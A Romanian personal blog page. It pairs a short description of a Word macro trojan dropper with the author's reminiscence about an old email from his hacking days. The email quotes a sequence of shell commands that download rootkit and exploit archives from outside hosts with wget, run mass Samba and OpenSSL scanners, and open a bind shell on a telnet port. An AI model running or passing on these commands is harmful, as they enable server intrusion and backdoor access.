Dropper.MSWord.Lafool.v

LS060E5.eXE

This file will be detected by Kaspersky Anti-Virus as Trojan-PSW.Win32.LdPinch.bbg

The file will then be launched for execution

Trojan-Dropper.MSWord.Lafool.v , este un virus care ataca fisierele Word  ( Microsoft Word ) . Rolul lui este de a lansa aplicatii prin care sa “planteze” noi virusi (trojan) in calculatorul infectat . Trojan Dropper . Este de ajuns deschiderea fisierului word infectat pentru ca virusul sa devina activ.

De regula acest virus ( Trojan-Dropper.MSWord.Lafool.v ) , este localizat in partitia de sistem ( C:\ , in cele mai multe cazuri ) si are numele de fisier LS060E5.eXE . In cazul in care anti-virusul nu-l poate neutraliza, cea mai simpla metoda ramane stergera lui manuala, dupa care facuta o scanare anti-virus a intregului sistem .

Distractie placuta ! ;-)

Hackers using such programs achieve two objectives:

1. Hidden or masked installation of other Trojans or viruses
2. Tricking antivirus solutions which are unable to analyse all components

E-mail - reminder

O noua zi de luni, un nou inceput de saptamana care nu anunta nimic spectaculos deocamdata. M-am trezit destul de tarziu si ca de obicei, imi deschid pc-ul si citesc mail-urile in compania unei cafele :-) . Nimic interesant in inbox. Mi-am aruncat privirea la spatiul ocupat pe yahoo si am fost putin surprins … 22% of 1GB. Multe mail-uri pastrate prin foldere care nu au fost deschise decat odata si asta in urma cu mult timp.

Am facut putina ordine (care a durat mai bine de o ora), si am surpriza sa gasesc niste mail-uri salvate de mine de pe niste adrese mai vechi. Mergand din aproape in aproape si incercand minute bune sa-mi aduc aminte parolele de la vechile casute de e-mail (ce mai mare prostie sa-ti schimbi o adresa de e-mail), am vazut un mail cu subiectul ROOT ! DOAMNEEEE ! ce minte aveam acum cativa ani si ce era de capul meu ! Hacker nu gluma ! :-)
Extras dintr-un mail:

To: rootXXX@yahoo.com, XXXX@i-cs.ro, XXX@yahoo.com
Subject: #root
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
User-Agent: Internet Messaging Program (IMP) 3.1
Content-Length: 1380
tar vf smb.tar.gz
cd smb
./start Clasa
wget www.awayms.as.ro/rewt.tgz
wget geocities.com/alinsimadi/china.tar.gz
wget www.linuxm.as.ro/x1.tgz | tar zxvf x1.tgz |
cd atd | ./mass -s 800
dupa ce prinzi ./osslmass2 mass.log
scan.tgz | cd new | ./scan ip ( samba)
wget www.linuxm.as.ro/bind.tgz | tar zxvf
bind.tgz | ./b2 | bind pentru
apache port telnet 3130
wget www.linuxm.as.ro/rk.tar.gz | tar zxvf
[....]

Sper sa nu le mai foloseasca nimeni in ziua de azi, mai ales ca scopul lor era cat se poate de “war” si consecintele “dureroase” atat pentru instituriile care au fost sparte cat si pentru pentru “atacator” daca este prins. NU se merita sa spargi un server pentru o tampenie de psyBNC (mIRC) sau pentru simpla “pasiune”.
Din simpla curiozitate totusi am vrut sa verific ceva. Am gasit cateva dns-uri care au fost sparte si constat ca nici astazi institutii din US nu sunt securizate si pot pica prada in orice moment unui copil dintr-o sala de net. Chiar nu inteleg…Universatile din Chicago (Loyola si UCLA), chiar nu au bani de investit in securitate, nu au resurse umane capabile sa securizeze un linux sau nu sunt interesati?
En fine … bine ca mi-am gasit alte preocupari. Adio I24 !